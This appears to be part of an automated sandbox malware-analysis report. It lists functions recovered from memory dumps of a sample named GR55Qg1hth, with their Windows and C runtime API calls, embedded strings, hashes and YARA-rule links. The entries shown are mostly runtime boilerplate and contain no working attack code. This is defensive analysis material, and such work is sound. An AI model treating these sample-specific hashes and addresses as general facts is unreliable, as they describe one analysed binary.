Opcode Fuzzy Hash: 41efe5dd4391930a206dfae007c65cfe8c29c96a2af1e7eb0a70ae8c621f8b0a
Instruction Fuzzy Hash: B7418CB2A08A97F0EF10DF59D5448B92B64EB55BC4B8C4532DE9DA73A1EE3CE541C700

Function 00007FF65024BAA0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF65024BB05
memcpy.MSVCRT ref: 00007FF65024BBD7

Strings

basic_string::append, xrefs: 00007FF65024BB62, 00007FF65024BC2C
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF65024BB69

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 3510742995-4063909124
Opcode ID: efbb5c11acff5310940aeacb30acc04531e8b3b51880a9f544812ed8c56a0b65
Instruction ID: bca383f1475a96bbd8677d3b21990effff6c9d9957aa562572a018ced071b63c
Opcode Fuzzy Hash: efbb5c11acff5310940aeacb30acc04531e8b3b51880a9f544812ed8c56a0b65
Instruction Fuzzy Hash: 154114B3B08A8BB0DA11DB2AD9585792B60FB55BC8F8C4432DE9DE7391EE2DD041C700

Function 00007FF650247A90 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF650247B37

Strings

basic_string::insert, xrefs: 00007FF650247AC5, 00007FF650247B6A
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF650247ACF, 00007FF650247B63
basic_string::_M_replace_aux, xrefs: 00007FF650247B76

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 2221118986-1339558951
Opcode ID: 1b1e9a7c13e4371a6f99a1f96264c427d9cc7de04fb812ce63d0c43e70b6199d
Instruction ID: 78d07f6d8aa90f378ab40b06136050b9c4e4bed0894afd2462efc7deafd248a9
Opcode Fuzzy Hash: 1b1e9a7c13e4371a6f99a1f96264c427d9cc7de04fb812ce63d0c43e70b6199d
Instruction Fuzzy Hash: 4D310436F09A87B1E620EB56DA418AD2750AB49FE8F8C4531DF5CA3791ED38E581C340

Function 00007FF650250A30 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF650250A42
memcpy.MSVCRT ref: 00007FF650250A94
memcpy.MSVCRT ref: 00007FF650250B44

Strings

basic_string::append, xrefs: 00007FF650250AEA

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy$wcslen
String ID: basic_string::append
API String ID: 1844840824-3811946249
Opcode ID: 9347f17a43babf017c691793bdb38873d863690a681ec80374466aafa5876449
Instruction ID: e04576b8d667bda09b217059611c62c6ffc45f79ec72ccf915bb2aaf2db9cb4f
Opcode Fuzzy Hash: 9347f17a43babf017c691793bdb38873d863690a681ec80374466aafa5876449
Instruction Fuzzy Hash: 1731A07AB08A47A0DA10DB16C9885BE2761FB55BC8B8C8532DE5D9B3E4EE3CD580C305

Function 00007FF650251670 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF650251684

Part of subcall function 00007FF650251750: malloc.MSVCRT ref: 00007FF650251761

malloc.MSVCRT ref: 00007FF6502516EA

Strings

basic_string::_M_create, xrefs: 00007FF650251750

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: malloc
String ID: basic_string::_M_create
API String ID: 2803490479-3122258987
Opcode ID: ae9a775b11c6fc9c2e092fe1f7e484b2d7502b17d7c9ee104dd07d8454008299
Instruction ID: 3e41df451ff8e978b7bc52f3a951a1639a6fe4bcdaf0b14b363b1a4981e170fc
Opcode Fuzzy Hash: ae9a775b11c6fc9c2e092fe1f7e484b2d7502b17d7c9ee104dd07d8454008299
Instruction Fuzzy Hash: 8B210835B06747A5FE589766A6113B826909F487A0F9C0634CE7D9B3C6EF3CE185C304

Function 00007FF65024D9C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF65024D9D2
memcpy.MSVCRT ref: 00007FF65024DA22
memcpy.MSVCRT ref: 00007FF65024DAD1

Strings

basic_string::append, xrefs: 00007FF65024DA7D

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy$strlen
String ID: basic_string::append
API String ID: 2619041689-3811946249
Opcode ID: d2326482581d9e514696b934b32d13eed50b3dbd77951243f47f78360ed909bf
Instruction ID: cb7f2b5be35fbb3ffb2b625a97f7d3075cbdd6f13eab33dd453558b5711a040b
Opcode Fuzzy Hash: d2326482581d9e514696b934b32d13eed50b3dbd77951243f47f78360ed909bf
Instruction Fuzzy Hash: 2D31E3B370CEA7B0DA10DA16D5586793B60EB46BD4F9C4532EEAEA7381DE2CD041C300

Function 00007FF650248330 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF6502483AB
memcpy.MSVCRT ref: 00007FF650248431

Strings

basic_string::_M_create, xrefs: 00007FF650248336

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_create
API String ID: 3510742995-3122258987
Opcode ID: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction ID: 97f4b8185dbfa1192c2db69797f78fb625b1e64ad1a975e653d2a5b9dc1851ab
Opcode Fuzzy Hash: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
Instruction Fuzzy Hash: FD31E073B19983B8E602AE2A860857D3F606B11FC8F5D8072DF9CA7796DE2CD481C340

Function 00007FF650247520 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF650247592
memcpy.MSVCRT ref: 00007FF6502475CC

Strings

basic_string::assign, xrefs: 00007FF650247635

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: memcpy
String ID: basic_string::assign
API String ID: 3510742995-2385367300
Opcode ID: 83a4c7e8fa1582f809345ef99c50e968c923fd71677e0adc4bf882d3cfeb7943
Instruction ID: c105a008b8d54cb449fdb07eceb19927e370c9f92ad9addf308029b28f32b072
Opcode Fuzzy Hash: 83a4c7e8fa1582f809345ef99c50e968c923fd71677e0adc4bf882d3cfeb7943
Instruction Fuzzy Hash: 94318176B09687B0EE159B1687441BD6E95AB4ABD4F8C8536DEACEF391DE3CE440C300

Function 00007FF650241580 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF6502415DA
MultiByteToWideChar.KERNEL32 ref: 00007FF65024161A

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 7f74731e942f046c8e72c35dc8318a084177015f036843bac978168059bb8f22
Instruction ID: c5964d4fcc8522b62b314bebf97477cdd1671585b6ce031b916338506b7e8e4e
Opcode Fuzzy Hash: 7f74731e942f046c8e72c35dc8318a084177015f036843bac978168059bb8f22
Instruction Fuzzy Hash: 1731D672A0C282A6E3608F26B50036D7A98BB81794F5C4235DADCD7BD5DF7DD4848F00

Function 00007FF650233C20 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF650233C3D
GetProcessAffinityMask.KERNEL32 ref: 00007FF650233C4C
GetCurrentProcess.KERNEL32 ref: 00007FF650233C92
SetProcessAffinityMask.KERNEL32 ref: 00007FF650233C9A

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: d37506894d666c153380770940b84c9797788700fbc4175b5c31bebff735ba34
Instruction ID: 57adf2bab65896f8a5130e594d6558d86b18c3dfa535e0965e5f34ad7a4fc83f
Opcode Fuzzy Hash: d37506894d666c153380770940b84c9797788700fbc4175b5c31bebff735ba34
Instruction Fuzzy Hash: 7F018431A18647A1EAB1572976443BB5B90BF4879CF882836DE4DA7350EE7CD645C300

Function 00007FF65022E5F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF65047F098,00007FFE2167ADA0,?,?,?,00000001,00007FF650221261), ref: 00007FF65022E795

Strings

Unknown pseudo relocation bit size %d., xrefs: 00007FF65022E855
Unknown pseudo relocation protocol version %d., xrefs: 00007FF65022E861

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: ProtectVirtual
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
API String ID: 544645111-395989641
Opcode ID: cd9e38df2c18dad77aefb04d397cd5349ebe5920ce9a5eb8afd39514f1ecb972
Instruction ID: df04e5b240e113596a63a3400487a3957e6c52340c8335377c802b326ef8e434
Opcode Fuzzy Hash: cd9e38df2c18dad77aefb04d397cd5349ebe5920ce9a5eb8afd39514f1ecb972
Instruction Fuzzy Hash: 3C61CD76F28683A6EF109F51AD401797BA1BB95B94F1C8231DE6DA7398DE3CE402D700

Function 000001B630F69E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001B630F69EB7

Strings

MOC, xrefs: 000001B630F69E7C
RCC, xrefs: 000001B630F69E85

Memory Dump Source

Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 26cea01d075f5f87c5aa44f8b9ba07c9df76bc91e613b3cb3ab01646d8da38b4
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 35614A36604B488AEB20DF65D4407DDB7E4F768B88F044219EF4D17BA9DB3AD599C700

Function 00007FF650230ED0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

%p not found?!?!, xrefs: 00007FF6502310EE

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID:
String ID: %p not found?!?!
API String ID: 0-11085004
Opcode ID: 177a3ea9713565d27c461e6c38c2e205021ee95a20308655bcdde169218979b4
Instruction ID: bf7b7fb418fc56019f167af32604e046810313f420a619705567d934cde7a676
Opcode Fuzzy Hash: 177a3ea9713565d27c461e6c38c2e205021ee95a20308655bcdde169218979b4
Instruction Fuzzy Hash: 58510936A1AB47A4FE649B1692953F82AA5AF4CB80F4C8035CE4CE67D1DF3CE485C311

Function 00007FF65022E2F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF65022E370

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF65022E357
Unknown error, xrefs: 00007FF65022E3DC

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 37c52b41da379d42167ac2f86afbd84dbf64a89c612c71dc3cef279e83f05fd2
Instruction ID: 339c55579e0868f1ac2cfb47acfb2ddafe4b68c65fea5bdaaeab38d76efa58c3
Opcode Fuzzy Hash: 37c52b41da379d42167ac2f86afbd84dbf64a89c612c71dc3cef279e83f05fd2
Instruction Fuzzy Hash: BC018E22908E8AE6D7128F1CD8011FA7374FF9979AF285321EA8C66320DF29E543C700

Function 00007FF65022E3B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF65022E370

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF65022E357
Overflow range error (OVERFLOW), xrefs: 00007FF65022E3B0

Memory Dump Source

Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true

Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: ec45c17de2dbf1fc296be5272a5fe98e5eec1b6ea0fd886e648861f84c17b2e8
Instruction ID: 968508d33268100ac0890122ba44140388dd1fb7b9bf6a9e96e276f9e69947fe
Opcode Fuzzy Hash: ec45c17de2dbf1fc296be5272a5fe98e5eec1b6ea0fd886e648861f84c17b2e8
Instruction Fuzzy Hash: 43F04F22908E8592D212CF19A4011AA7364FF4D799F585326EA8D76665DF28E5438700

Function 00007FF65022E3A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF65022E370

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF65022E357
Partial loss of significance (PLOSS), xrefs: 00007FF65022E3A0

Memory Dump Source

